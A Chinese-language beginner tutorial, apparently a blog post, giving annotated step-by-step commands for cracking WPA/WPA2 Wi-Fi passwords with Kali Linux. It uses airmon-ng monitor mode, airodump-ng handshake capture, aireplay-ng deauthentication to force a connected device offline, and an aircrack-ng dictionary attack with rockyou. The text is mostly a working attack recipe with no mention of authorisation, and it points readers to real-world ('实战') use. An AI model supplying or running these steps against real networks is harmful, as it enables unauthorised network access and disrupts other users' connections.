Kali破解wifi最基础版

网上类似的文章已经非常多了，不过对刚装好kali的小白还不够友好。本文中几乎每条语句都有注解，希望大家都能看懂

================================================================================================

Kali 能做的事非常多，破解wifi当然只是小试牛刀。
当然破解wifi也有很多手段，今天主要写下比较适合新手的使用Aircrack破解wpa/wpa2密码

大部分人的kali都是装在虚拟机上吧（我也出过vm装kali教程），这时候我们需要一块支持监控模式的网卡（某宝20块就能买）
字典就直接用Kali Linux自带的rockyou字典（只能破解密码不太复杂的wifi）

打开终端
1 在终端中执行：#gzip -d /usr/share/wordlists/rockyou.txt.gz（解压字典文件）

2 在终端中执行：# airmon-ng

3 找到你的网卡（一般就是wlan0）开启监听模式：
在终端中执行：airmon-ng check kill（有些进程会影响到monitor模式的开启，这条命令是为了杀掉那些进程）

在终端中执行：airmon-ng start wlan0（这里的wlan0是你的网卡名称，视你的情况而定，别死脑筋）

在终端中执行：iwconfig（网卡的名字后边应该加了个“mon”后缀说明正常开启）

4 在终端中执行：airodump-ng wlan0mon （扫描周围热点）

记下你想要破解的wifi的BSSID和信道

5 抓包（这一步要根据上一部扫描的情况进行）

命令格式如下：
airodump-ng -c 信道 --bssid BSSID -w ~/ wlan0mon
BSSID是你想要破解的wifi
信道就是你要破解的wifi的CH，那里边是几这里就填几

执行后进入这个界面

STATION是连接设备的MAC地址，记住一个
为了破解除密码我们必须抓到握手包，想抓握手包就得等有设备连接路由器，为了节省时间我们找一个连接的设备让他强制下线这样当他重连时我们就可以抓到握手包！

再打开一个新的终端标签页
命令格式如下：
aireplay-ng -0 2 -a 路由器BSSID -c 强制断开的设备的MAC地址 wlan0mon

执行后我们查看第一个标签页中的抓包进程应该就抓到了（抓到后右上角会有“handshake”提示）
如图

抓到后按Ctrl-C结束
如果没有，重复执行上一条命令，直到抓到握手包

6 在终端中执行： airmon-ng stop wlan0mon（关闭网卡监听模式）

7 aircrack破解密码
命令格式：
aircrack-ng -a2 -b BSSID -w /usr/share/wordlists/rockyou.txt ~/*.cap
（关于字典和存储位置，如果你一直按照教程默认的话只需改下BSSID为你破解的wifi的BSSID就行了，其他的不需改动）

KEY FOUND 里的就是密码了啊

注意：我这里实验用僚机路由器的密码比较简单，实战情况下可能会破解好长时间。如果出现字典跑完还没跑出来的情况说明kali自带的字典是搞不定啦，这时候我们就需要换个更复杂（大）的字典

有什么问题可以评论留言哦